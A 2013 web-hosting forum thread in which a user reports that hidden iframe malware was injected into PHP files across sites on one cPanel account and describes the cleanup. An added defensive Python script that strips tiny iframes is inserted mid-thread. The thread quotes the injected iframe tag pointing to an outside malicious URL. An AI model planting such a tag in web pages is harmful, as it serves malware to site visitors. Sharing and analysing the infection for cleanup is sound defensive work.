
Warning People for Cpanel Users MALWARE

Discussion in 'Web Hosting' started by katika, Feb 16, 2013.

  1. katika

    katika Junior Member

    I am really pissed now, Google sent me a notice that my main site is flagged because there is malware.

    I am in the middle of a promotion, agghhhh.

    So motherfuckers injected an iframe in my head section, randomly, in plugins, theme...

    Here is code:

    Code:
    <iframe src="http://www.phrae.tv/images/update.php" width="2" height="2" frameborder="0"></iframe>
    A few weeks ago I received an email from one of the BH forums, I do not remember which one, to buy some crazy tool for code injection; the deal was about 100 USD.

    Now every fool and his brother can hack cPanel for a small price, without knowing any code.

    I have customer sites on that cPanel. And every one is infected with this iframe.

    And cPanel does not have a multiple find-and-replace tool.

    So I must download every backup, do the cleaning and upload the files. And be at Big G's mercy to remove the flag from search results...

    Don't know what to say. Any suggestions? Tips? Words to calm me down? :(


    katika
     
  2. njohnson3163

    njohnson3163 Newbie

    Thanks for warning me about that! I'm actually going to look into how to secure myself from that now.
     
  3. NProductions

    NProductions Jr. VIP Premium Member

    Thanks for sharing & making us aware. Keep up the good work!
     
  4. katika

    katika Junior Member

    Here is an update.

    Big G removed the warning 6-12 hours after I pressed the review button in the webmaster tool.

    Once again: I got the email from Big G because I had an inactive AdWords ad. So if I did not have the site in AdWords, this site and the others on the same cPanel would still be infected with this 2px iframe.

    Other cPanels from my WHM were not infected.

    All my 12 domains on that cPanel account were infected: PHP files (WordPress or other) which had something to do with the head section of the site, mostly header.php in the theme folder, some plugin files... others in the main WP folder and some root files too, about 50-60 files per site.

    I have a lot of plugins and every site is 40-70 megs.

    Here are the steps for cleaning the malware:

    1. I compressed the files into a zip in cPanel
    2. Downloaded them, one by one
    3. Unpacked them
    4. Multiple find-and-replace to remove the iframe code.
    5. Zipped them and uploaded to the server.
    6. Opened every domain in a browser to check whether I did a good job
    7. Submitted the form to Big G to ask for a review


    Step 5 was the time consumer: infected files are in all folders, and I do not have unlimited upload speed, so I split the files to get zips of 5-20 megs per site.

    Took me about 3 hours to do that.

    Google removed the Red Window Warning in 15 minutes.

    I was tired (3rd hour after midnight); this saga lasted about 6-7 hours: from the email from Big G and my stress... browsing to find out about the problem, coffee breaks, tactics...

    When I woke up, the blue warning line in the search engine results was gone :)

    I hope you will never have this kind of problem, but here is my story and the steps to solve the problem.

    The worst thing: my VPS support failed me; they never answered my tickets.

    Maybe they could speed up the task by doing a multiple find-and-replace on the server, but I do not know if Linux has this option as Win does.

    regards
    katika
     
    Last edited: Feb 17, 2013
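
Added example, not part of the thread and not katika's code: the multi-file find-and-replace the post above asks about, run on the server itself in Python instead of downloading each site. It goes beyond the single iframe quoted in the thread by matching any empty iframe whose width and height are both at most 5 px; that threshold, the extension list and the `.infected.bak` backup suffix are assumptions.

```python
import re
import shutil
import sys
from pathlib import Path

# A complete, empty <iframe ...></iframe> element (any case, may span lines).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>\s*</iframe>", re.I)
# width/height attribute values, quoted or unquoted.
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.I)
MAX_PX = 5  # assumption: an iframe this small is not meant to be seen
EXTENSIONS = {".php", ".html", ".htm", ".js", ".tpl"}  # assumption: files to scan

def is_hidden_iframe(tag):
    """True when width and height are both present and at most MAX_PX."""
    dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
    return {"width", "height"} <= set(dims) and max(dims.values()) <= MAX_PX

def strip_hidden_iframes(text):
    """Return (cleaned_text, removed_tags); normal-sized iframes are kept."""
    removed = []

    def repl(m):
        if is_hidden_iframe(m.group(0)):
            removed.append(m.group(0))
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, text), removed

def clean_tree(root, apply=False):
    """Report hidden iframes under root; rewrite files only when apply=True."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        # latin-1 maps every byte to one character, so untouched bytes
        # (encoding, CRLF line endings) are written back unchanged.
        text = path.read_bytes().decode("latin-1")
        cleaned, removed = strip_hidden_iframes(text)
        if removed:
            report[str(path)] = removed
            if apply:
                shutil.copy2(path, path.with_name(path.name + ".infected.bak"))
                path.write_bytes(cleaned.encode("latin-1"))
    return report

if __name__ == "__main__":
    hits = clean_tree(sys.argv[1], apply="--apply" in sys.argv)
    for name, tags in hits.items():
        print(f"{name}: {len(tags)} hidden iframe(s)")
```

Run it without `--apply` first to review the report; the backup copies land next to the originals inside the web root, so move or delete them once the cleaned site is verified.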
  5. iulianh

    iulianh Regular Member

    I think an unmanaged Linux VPS without cPanel is safer now :) Thanks for the heads up.
     
  6. SmartMan

    SmartMan BANNED

    Did you use any nulled themes/plugins on any of your sites? Also which hosting do you use?
     
  7. Tsongkie

    Tsongkie Regular Member

    Happened to me before when I used a "cracked" FTP client.
     
  8. katika

    katika Junior Member

    All my sites have the same legal Artisteer themes; of 5 cPanels only this one was abused; yes, there are some plugins.

    Cute FTP maybe?